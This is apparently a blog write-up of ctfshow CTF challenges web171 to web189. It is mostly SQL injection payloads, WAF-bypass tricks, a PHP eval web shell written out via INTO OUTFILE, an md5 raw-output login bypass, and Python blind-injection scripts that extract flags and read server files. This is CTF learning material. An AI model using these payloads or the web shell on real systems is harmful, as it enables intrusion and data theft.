ctfshow(web171-web189)

1' order by 3 --+ 正常
1' order by 4 --+ 报错

0' union select 1,2,3 --+ 三个显性位置

0' union select 1,2,database() --+ 当前数据库名为ctfshow_web

0' union select 1,2,table_name from information_schema.tables where table_schema='ctfshow_web' limit 0,1--+  该ctfshow-web数据库只有 ctfshow_user表

0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='ctfshow_web' and table_name='ctfshow_user' limit 0,1--+ 有id，username password三个字段

0' union select 1,2,concat_ws(id,username,password) from ctfshow_web.ctfshow_user where username='flag' limit 0,1--+  获得flag

总结：前面username != ‘flag’对联合注入无效联合注入也添加where条件为username=’flag‘即可

web172

打开发现一只猫需要点击select模块

1' and '1'='1' --+

1' and '1'='2' --+

字符型注入点

1' order by 2 --+ 成功
1' order by 3 --+ 不成功 只有两列

1' union select 1,2 --+ 两个位置都显示出来了

0' union select 1,database() --+ 

0' union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web' --+ 发现有两张表 ctfshow_user1/user2  按照提示也是在第二张表中进行查找元素

总结直接就能查询了 select 1，password 没有username flag字符串在 username中

0' union select 1,password from ctfshow_web.ctfshow_user2 where username='flag' limit 0,1--+

web173

总结通过前两题基础? 直接看提示输出三个字段依旧是字符型注入点在user3的表中查询并且过滤返回结果是否存在flag字符串和上一题同理 flag字符串在username字段中不查询username即可并且ctfshow的flag也不存在flag字符串
0' union select 1,2,password from ctfshow_web.ctfshow_user3 where username='flag' limit 0,1--+

web174

过滤了flag或者数字

在输入id=2和3的时候是没有回显的因为回显中包含了数字

flag中大概率也会有数字可以用base64编码或者hex编码绕过,to_base64(),hex()

试过了编码,都没有回显,应该是编码后还是存在数字,只能换个方法了

先编码如果编码中存在数字进行替换

-1' union select 'a',replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(to_base64(password),"1","@A"),"2","@B"),"3","@C"),"4","@D"),"5","@E"),"6","@F"),"7","@G"),"8","@H"),"9","@I"),"0","@J") from ctfshow_user4 where username = 'flag' --+

将的得到的内容粘贴到解密脚本中
import base64
flag64 = 'Y@CRmc@Bhvd@CtiNTNmOTMwYS@J@JMjVjLTQ@ANjctODM@AZS@JyNWNkMGUwMGEwM@BJ@I'
flag = flag64.replace("@A", "1").replace("@B", "2").replace("@C", "3").replace("@D", "4").replace("@E", "5").replace(
    "@F", "6").replace("@G", "7").replace("@H", "8").replace("@I", "9").replace("@J", "0")
flag = base64.b64decode(flag) #经过 Base64 解码后的字节数据
flag = flag.decode('utf-8')   #对字节数据进行utf-8编码 
print(flag)
总结如果过滤必须输出出来内容可以使用加密和替换得到结果再反替换和解密

web175

?只要匹配上0-127ASCII字符就返回FALSE ,不能输出可以使用写文件的方式得到getshell?

写文件

第一种写木马?
1‘ union select 1,"<?php eval($_POST[1]); ?>" into outfile '/var/www/html/1.php
不行那就试试持续加密先对内容进行base64加密再进行url加密最后用数据库内部函数from base64解码?

在这里卡了好久犯了一个致命的错误就是id必须是一个不存在的否则影响一句话木马的执行
1' union select 1,from_base64("%50%44%39%77%61%48%41%67%5a%58%5a%68%62%43%67%6b%58%31%42%50%55%31%52%62%4d%56%30%70%4f%7a%38%2b") into outfile '/var/www/html/1.php
99' union select 1,from_base64("%50%44%39%77%61%48%41%67%5a%58%5a%68%62%43%67%6b%58%31%42%50%55%31%52%62%4d%56%30%70%4f%7a%38%2b") into outfile '/var/www/html/1.php
查看当前目录有一个api

查看api目录有config.php

查看config.php文件有连接数据库的账号密码

使用蚁剑连接右键数据操作?

找到flag

第二种将结果写入到txt文件中访问txt文件
1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/2.txt'--+
总结

如过过滤所有输出可以使用写文件的方式

web176

这关开始就过滤了所以我们要从头来越细越好因为不知道过滤了什么举个例子?

1' --+ 能输出代表注释没被过滤

1' order by 3--+ 成功

1' order by 4--+ 失败

order没被过滤

1' union select 1,2,3--+ 无显示估计是有被过滤的

1' UNION SELECT 1,2,3 --+ 过滤了小写以及双写没过滤大写

步骤与web171同理得出这个表名为 ctfshow_user

最终poc
0' UNION SELECT 1,2,password from ctfshow_web.ctfshow_user where username='flag'--+
总结过滤了union select的小写以及双写没过滤大写

web177

1'%0aand%0a'1'='1'%23 成功

1'%0aand%0a'1'='2'%23 失败

过滤了空格和注释符

过滤了空格用%0a或者/**/代替即可过滤了注释使用 %23进行代替

最终poc
0'%0aUNION%0aSELECT%0a1,2,password%0afrom%0actfshow_web.ctfshow_user%0awhere%0ausername='flag'%23
总结过滤空格使用%0a或者/**/代替过滤注释使用%23代替

web178

1'%0aand%0a1=1%23 成功

1'%0aand%0a1=2%23 失败

和上一题一样加上过滤了/**/ 直接用上一题poc即可上一题我用的%0a代替的空格
0'%0aUNION%0aSELECT%0a1,2,password%0afrom%0actfshow_web.ctfshow_user%0awhere%0ausername='flag'%23

web179

1'%0cand%0c1=1%23? 成功

1'%0cand%0c1=2%23? 失败

过滤了空格的%0a但是还可以使用%0c替换
0'%0cUNION%0cSELECT%0c1,2,password%0cfrom%0cctfshow_web.ctfshow_user%0cwhere%0cusername='flag'%23
总结：

空格被过滤可以用，/**/，%09，%0a，%0b，%0c，%0d还有括号绕过

web180

1' --+? 无结果? ? 注释被过滤

1’%23 无结果? ? %23也被过滤

1’‘? 成功? 多加一个单引号闭合服务器中的单引号

1'%0cand%0c'1'='1''? ?这里我出现一个问题我想直接使用两个双引号但是不成功估计是连续三个单引号导致的那就是用or 一真则真

1'%0cand%0c'1'='1 只能这样

1'%0cor%0c'1'='1'' 这样也可以

1'%0cor%0c'1'='1' 这样就不行了?
0'%0cUNION%0cSELECT%0c1,2,password%0cfrom%0cctfshow_web.ctfshow_user%0cwhere%0cusername='flag'%0cand%0c'1'='1
?总结：

注释的方法有三种，-- 和#还有闭合号注释

web181

不能用select 直接在原语句构造

只过滤了x0c等但是%0c没过滤（虽然写法不同但是都是算是换页符）对我们没有影响，（这个时候%0a %0b都不行我估计是也被过滤了）主要是过滤了select 不能使用联合查询等?/i 标志表示不区分大小写。

于是在原语句进行构造一定多尝试！！
0'%0cor%0cusername="flag"%0cand%0c'1'='1
0'%0cor%0cusername="flag"'
总结如果前面存在否定但是后面有or 不影响or语句

web182

输入的时候把flag关键字过滤了使用sql查询语句中的 like即可
0'%0cor%0cusername%0clike%0c"f___"'

web183

确实还是这张表

看看你pass字段里有没有包含ctfshow的行可以用反引号当空格

确实存在这么一列? 还有一点有的时候不行记住url编码

发现如果存在指定内容就返回记录数1 如果不存在就为0 也就相当于布尔盲注进行判断

python脚本（这是本人第一次跟老师弄得sql python脚本）

很感慨这python脚本很强大第一眼看到的时候感觉具难慢慢发现很好理解

import requests #请求模块
import time #睡眠模块
# 需要请求的url
url = "http://9039ff9b-cdf4-4377-9593-411c132bbf99.challenge.ctf.show/select-waf.php"
# 字典 因为已知flag就有0-9 a-z 所以就是一个简易字典
flagstr="ctfshow}{0123456789-abcdefghijklmnopqrstuvwxyz"
# 先定义一个flag为空
flag = ""
# 循环45次因为flag为45个字符 range(0,45)表示一个从 0 到 37 的整数序列
for i in range(0,45):
    # 遍历我们的字典
    for x in flagstr:
        # 这是post请求中提交的数据 正则匹配 {}为flag+x占位 注意regexp里面要用双引号包裹起来
        data = {
            "tableName":"`ctfshow_user`where`pass`regexp('{}')".format(flag+x)
        }
        # 提交post请求 将服务器的应答报文赋值给response变量
        response = requests.post(url,data=data)
        # 有并发数量限制的题目，就睡一段时间
        # time.sleep(0.3)
        # 在应答报文中找关键点 如果找到了 返回1 没找到返回0
        # 如果找到了输出一下当前遍历的x 并且将这个x追加到flag变量中 且推出当前循环
        if response.text.find("user_count = 1;")>0:
            print("+++++++++++++++++++={} is right".format(x))
            flag+=x
            break
    print(flag)
# ctfshow{66127f11-44a5-4109-9355-ae209cbe5f6e}

web184

过滤的很多?

单引号双引号反引号都被屏蔽了甚至还有where 就是没有过滤空格

单引号双引号可以使用十六进制代替 where 可以使用group by分组联合having代替

注意having 条件是关于pass的那么group by 后面就要跟pass

import requests  # 请求模块
import time  # 睡眠模块
# 定义一个将字符串转换成十六进制的函数
def string_to_hex(input_string):
    # 使用encode方法将字符串转换为字节串，再使用hex函数得到十六进制表示
    tzy = input_string.encode().hex()
    return tzy
# 需要请求的url
url = "http://9767a3b2-080b-405f-95f7-77513dd1b4f0.challenge.ctf.show/select-waf.php"
# 字典 因为已知flag就有0-9 a-z 所以就是一个简易字典
flagstr = "ctfshow}{0123456789-abcdefghijklmnopqrstuvwxyz"
# 先定义一个flag为空
flag = ""
# 循环45次因为flag为45个字符 range(0,45)表示一个从 0 到 37 的整数序列
for i in range(0, 45):
    # 遍历我们的字典
    for x in flagstr:
        # 这是post请求中提交的数据 正则匹配 {}为flag+x占位 注意regexp里面要用双引号包裹起来
        data = {
            "tableName": " ctfshow_user group by pass having pass regexp(0x{})".format(string_to_hex(flag+x))
        }
        # 提交post请求 将服务器的应答报文赋值给response变量
        response = requests.post(url, data=data)
        # 有并发数量限制的题目，就睡一段时间
        # time.sleep(0.3)
        # 在应答报文中找关键点 如果找到了 返回1 没找到返回0
        # 如果找到了输出一下当前遍历的x 并且将这个x追加到flag变量中 且推出当前循环
        if response.text.find("user_count = 1;") > 0:
            print("+++++++++++++++++++={} is right".format(x))
            flag += x
            print(x)
            break
    print(flag)

web185

且数字被过滤了

本来想着传入ascii(a)-ascii(b)但是正确写法为ascii(’a‘)-ascii(‘b’)单引号还被过滤了

只能跟着大师傅的方法走了

使用concat进行字符的连接

构造出将十六进制数分别转换成该形式

按照这个思路自己写了一个转换函数

def hex_to_long(input_hex):
    tmp="concat("
    for x in input_hex:
        if ord(x)>=97:
            print(type(x))
            tmp += "str("+x+"),"
        else:
            x=int(x)
            tmp += "("
            for i in range(x):
                tmp+="true+"
                if i==x-1:
                    tmp = tmp[:-1]+"),"
    tmp += tmp[:-1]+")"
    return tmp
print(hex_to_long("a12bq12we"))

输出，在concat中字符必须使用引号否则报错但是又发现单引号被过滤了

concat('a',(true),(true+true),'b','q',(true),(true+true),'w','e',concat('a',(true),(true+true),'b','q',(true),(true+true),'w','e')

那就把a先转换成ascii的形式例如a为97 97个true相加再用char(97)进行转换即可绕过单引号过滤

转换函数

import requests  # 请求模块
import time  # 睡眠模块
# 定义一个将字符串转换成十六进制的函数
def string_to_hex(input_string):
    # 使用encode方法将字符串转换为字节串，再使用hex函数得到十六进制表示
    tzy = input_string.encode().hex()
    return tzy
def hex_to_long(input_hex):
    tmp = "concat("
    for x in input_hex:
        if ord(x) >= 97:
            tmp += "char("
            for t in range(ord(x)):
                tmp += "true+"
                if t == ord(x) - 1:
                    tmp = tmp[:-1]
                    tmp += "),"
        else:
            x = int(x)
            tmp += "("
            for i in range(x):
                tmp += "true+"
                if i == x-1:
                    tmp = tmp[:-1]
                    tmp += "),"
    tmp = tmp[:-1]
    tmp += ")"
    return tmp

完整python脚本（当前时间为14：11）这个时候我使用完整脚本测试的时候出问题了在15：39全部修改完毕

原因

?-符号必须也要转换成ascii次数的true相加否则在concat执行时-会报错? 并且0也没有使用false?

import requests  # 请求模块
import time  # 睡眠模块
def hex_to_long(input_hex):
    tmp = "concat("
    y=0
    y+=1
    for x in input_hex:
        if ord(x) >= 97 or ord(x) == 45 :
            tmp += "char("
            for t in range(ord(x)):
                tmp += "true+"
                if t == ord(x) - 1:
                    tmp = tmp[:-1]
                    tmp += "),"
        else:
            if ord(x) > 48 and ord(x) <= 57:
                x = int(x)
                tmp += "("
                for i in range(x):
                    tmp += "true+"
                    if i == x-1:
                        tmp = tmp[:-1]
                        tmp += "),"
            else:
                if ord(x) == 48:
                    tmp += "(false),"
    tmp = tmp[:-1]
    tmp += ")"
    return tmp
url = "http://072a1b91-18d3-4c23-9f3c-54432b823e02.challenge.ctf.show/select-waf.php"
flagstr = "ctfshow}{0123456789-abcdefghijklmnopqrstuvwxyz"
flag = ""
for i in range(0, 45):
    # 遍历我们的字典
    for x in flagstr:
        data = {
            "tableName":"ctfshow_user group by pass having pass regexp({})".format(hex_to_long(flag+x))
        }
        response = requests.post(url, data=data)
        if response.text.find("user_count = 1;") > 0:
            print("+++++++++++++++++++={} is right".format(x))
            flag += x
            print(flag)
            break
        #else:
            #print("+++++++++++++++++++={} is wrong".format(x))
            #print(flag+x)

web186

增加了尖括号^和%的过滤。对我们无影响直接使用上一题的payload

web187

题中$password = md5($_POST['password'],true);，将md5函数的第二参数设置为了true。

raw_output：如果可选的 raw_output 被设置为 TRUE，那么 MD5 报文摘要将以16字节长度的原始二进制格式返回。

这里的二进制格式，并不是指转成0101，而是binary mode。

对这个函数的进行本地测试，看一下：

ffifdyop是一个特殊的字符串，类似万能密码。还有129581926211651571912466741651878684928也可以达到同样的效果（经过测试好像没用）。

查询语句就变成了
$sql = "select count(*) from ctfshow_user where username = 'admin' and password= ''or'6�]��!r,��b';
获取flag

总结 '0'or'3aaa' 恒为真? 提示只有admin才能回去flag 那就用admin登录密码用万能密码?

下面的图片解释一下啊万能密码

web188

数字和字符串比较的话会把字符串转换成数字如果在sql语句中条件最好是字符如果为整形就造成了弱类型比较字母开头的转换成数字都是0 所以当用户名为0 时就能把所有用户名开头为字母的查出来

这个密码判断转换成整形和数据库的字符密码比较也是弱类型比较也能成功

直接抓包获取flag

web189

密码判断时不转换成整形了

提示flag在api/index.php中

群主说直接写脚本读并说是凌晨四点25分? 太强了哥

跟着视频一步一步学

思路就是通过admin位置进行注入进行读文件判断这个单个字符是哪一个字符（就是布尔注入）首先就是找输入什么的时候页面有区别

注意无论什么题一定要多多测试

多多测试?多多测试?多多测试?多多测试！！！！！！！！！！！！！！！！！！！！

在username为0和1的时候有区别

0的返回表单内容有u8bef

1的返回表单内容有u8d25

这就构成了盲注的条件

在写脚本之前先判断一下固定语句是什么

首先就是where后 id=可以直接跟if语句

传参直接传if就可以?

因为是php文件开头肯定是<? 第一个肯定是<?

怎么发现if语句是永真我取一位试试

发现第一位只有<返回1?

确定了固定部分语句了开始写脚本

我真的服了? 我认为是没有问题的?

单独把if(substr(load_file('/var/www/html/api/index.php'),{},1)regexp('{}'),1,0)拿出来都好使放到脚本就不好使

我弄了一个点查出原因?

脚本的返回包是页面源代码

而真正的识别码在bp抓到的返回包中

2023/12/14 19:37问群里的人没人回复先留着以后再弄
import requests #请求模块
url = "http://78d681d9-5dcb-431a-a7e5-5af55e290985.challenge.ctf.show/select-waf.php"
flagstr="<}{0123456789-abcdefghijklmnopqrstuvwxyz><?#=,;$"
flag = ""
for i in range(1,300):
    for x in flagstr:
        print(x)
        data = {
            "username":"if(substr(load_file('/var/www/html/api/index.php'),{},1)regexp('{}'),1,0)".format(i,x),
            "password":"0"
        }
        print(data)
        response = requests.post(url,data=data)
        #print(response.text)
        if response.text.find("u8d25")>0:
            print("+++++++++++++++++++={} is right".format(x))
            flag+=x
            break
        else:
            print("+++++++++++++++++++={} is wrong".format(x))
    print(flag)
时隔五天回头看发现问题在哪了

再post提交进行抓包的时候发现提交的位置是/api的位置在脚本中将数据提交的位置是原页面所以获取不到想要的结果?

修改url位置在后面加上api即可
import requests #请求模块
url = "http://78d681d9-5dcb-431a-a7e5-5af55e290985.challenge.ctf.show/api"
flagstr="<}{0123456789-abcdefghijklmnopqrstuvwxyz><?#=,;$"
flag = ""
for i in range(1,300):
    for x in flagstr:
        print(x)
        data = {
            "username":"if(substr(load_file('/var/www/html/api/index.php'),{},1)regexp('{}'),1,0)".format(i,x),
            "password":"0"
        }
        print(data)
        response = requests.post(url,data=data)
        #print(response.text)
        if response.text.find("u8d25")>0:
            print("+++++++++++++++++++={} is right".format(x))
            flag+=x
            break
        else:
            print("+++++++++++++++++++={} is wrong".format(x))
    print(flag)
得到flag

文章来源:https://blog.csdn.net/m0_72125469/article/details/134950883
本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若内容造成侵权/违法违规/事实不符，请联系我的编程经验分享网邮箱：chenni525@qq.com进行投诉反馈，一经查实，立即删除！